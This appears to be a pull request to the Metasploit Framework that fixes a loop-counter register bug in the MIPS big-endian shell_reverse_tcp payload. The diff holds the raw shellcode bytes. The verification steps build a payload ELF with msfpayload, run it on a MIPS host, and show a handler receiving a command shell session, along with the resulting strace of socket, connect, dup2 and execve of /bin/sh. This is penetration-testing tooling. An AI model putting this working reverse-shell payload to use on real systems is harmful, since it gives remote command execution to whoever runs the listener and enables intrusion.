### PR TITLE
Fix the mipsbe shell_reverse_tcp payload

### DIFF
--- a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb
@@ -88,15 +88,15 @@ module Metasploit3
       # sys_dup2
       # a0: oldfd (socket)
       # a1: newfd (0, 1, 2)
-      "\x24\x0f\xff\xfd" + # li t7,-3
-      "\x01\xe0\x78\x27" + # nor t7,t7,zero
+      "\x24\x11\xff\xfd" + # li s1,-3
+      "\x02\x20\x88\x27" + # nor s1,s1,zero
       "\x8f\xa4\xff\xff" + # lw a0,-1(sp)
-      "\x01\xe0\x28\x21" + # move a1,t7
+      "\x02\x20\x28\x21" + # move a1,s1 # dup2_loop
       "\x24\x02\x0f\xdf" + # li v0,4063 # sys_dup2
       "\x01\x01\x01\x0c" + # syscall 0x40404
       "\x24\x10\xff\xff" + # li s0,-1
-      "\x21\xef\xff\xff" + # addi t7,t7,-1
-      "\x15\xf0\xff\xfa" + # bne t7,s0,68 <dup2_loop>
+      "\x22\x31\xff\xff" + # addi s1,s1,-1
+      "\x16\x30\xff\xfa" + # bne s1,s0,68 <dup2_loop>
 
       # sys_execve
       # a0: filename (stored on the stack) "//bin/sh"


### PR DESCRIPTION
There is a subtle but important error on the mipsbe shell_reverse_tcp encoder, where it's using a temporary register to store a loop counter, whose value must be preserved over system calls. Unfortunately the $t7 temporary register isn't a good option.
# Verification
- [ ] Generate an elf with the payload embedded

```
Juans-MacBook-Pro:metasploit-framework juan$ ./msfpayload linux/mipsbe/shell_reverse_tcp LHOST=192.168.172.1 LPORT=4444 X > /tmp/shell.elf
Created by msfpayload (http://www.metasploit.com).
Payload: linux/mipsbe/shell_reverse_tcp
 Length: 184
Options: {"LHOST"=>"192.168.172.1", "LPORT"=>"4444"}
Juans-MacBook-Pro:metasploit-framework juan$ scp -P 2223 /tmp/shell.elf juan@192.168.172.134:/home/juan
```
- [ ] Run the msfconsole and use the exploit/multi/handler module with the samee payload:

```
msf exploit(handler) > set payload linux/mipsbe/shell_reverse_tcp
payload => linux/mipsbe/shell_reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/mipsbe/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.172.1    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
```
- [ ] Upload the elf to a MIPSBE based machine, give +x permissions and execute instrument systemcalls with strace:

```
juan@mipsdebian:~$ chmod +x shell.elf 
juan@mipsdebian:~$ strace ./shell.elf 2> ouput
```
- [ ] Verify which the session is working on the msfconsole

```
[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Command shell session 8 opened (192.168.172.1:4444 -> 192.168.172.134:59001) at 2014-01-07 18:02:28 -0600

id
uid=1000(juan) gid=1000(juan) groups=1000(juan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
ls
apmib-ld.a
apmib-ld.o
apmib-ld.so.bak
apmib.c
boa
error.log
ouput
shell.elf
shellbe.elf
```
- [ ] Verify the sequence of system calls on the strace output, you should find something like that:

```
execve("./shell.elf", ["./shell.elf"], [/* 16 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16) = 0
dup2(3, 2)                              = 2
dup2(3, 1)                              = 1
dup2(3, 0)                              = 0
execve("//bin/sh", ["//bin/sh"], [/* 0 vars */]) = 0
```
- [ ] Verify the dup2 calls! There should be three dup2 calls with newfd the result of the previous socket systemcall, and newfd = {2, 1, o}
